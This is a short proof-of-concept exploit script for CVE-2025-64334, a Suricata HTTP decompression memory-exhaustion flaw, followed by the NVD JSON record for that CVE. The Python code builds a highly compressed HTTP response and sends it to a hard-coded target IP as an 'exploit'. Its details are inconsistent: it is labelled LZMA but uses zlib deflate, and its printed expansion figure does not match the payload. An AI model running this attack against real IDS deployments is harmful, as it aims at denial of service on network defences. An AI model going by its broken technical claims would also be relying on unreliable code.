CVE-2025-64334

# CVE-2025-64334 PoC - Suricata LZMA Decompression Memory Exhaustion # This PoC demonstrates sending a malicious HTTP response with highly compressible data import socket import zlib import struct def create_malicious_http_response(): """ Create HTTP response with compressed data that expands significantly during decompression """ # Create data that compresses very well (repetitive pattern) # This will cause memory exhaustion during decompression original_data = b'A' * 1000000 # 1MB of repetitive data # Use zlib compression - creates small compressed data that expands significantly compressed_data = zlib.compress(original_data, 9) # Create HTTP response with compressed content http_response = b'HTTP/1.1 200 OK\r\n' http_response += b'Content-Encoding: deflate\r\n' http_response += b'Content-Length: ' + str(len(compressed_data)).encode() + b'\r\n' http_response += b'\r\n' http_response += compressed_data return http_response def exploit_suricata(target_ip, target_port=80): """ Send malicious HTTP response to trigger memory exhaustion in Suricata """ malicious_response = create_malicious_http_response() try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) sock.send(malicious_response) sock.close() print(f"Malicious HTTP response sent to {target_ip}:{target_port}") print(f"Compressed size: {len(zlib.compress(b'A' * 1000000))} bytes") print(f"Decompressed size: 1000000 bytes (100x expansion)") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Target Suricata instance target = "192.168.1.100" exploit_suricata(target)

{"cve": {"id": "CVE-2025-64334", "sourceIdentifier": "[email protected]", "published": "2025-11-26T23:15:48.750", "lastModified": "2025-12-05T19:51:28.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. In versions from 8.0.0 to before 8.0.2, compressed HTTP data can lead to unbounded memory growth during decompression. This issue has been patched in version 8.0.2. A workaround involves disabling LZMA decompression or limiting response-body-limit size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/commit/00f04daa3a44928dfdd0003cb9735469272c94a1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-r5jf-v2gx-gx8w", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}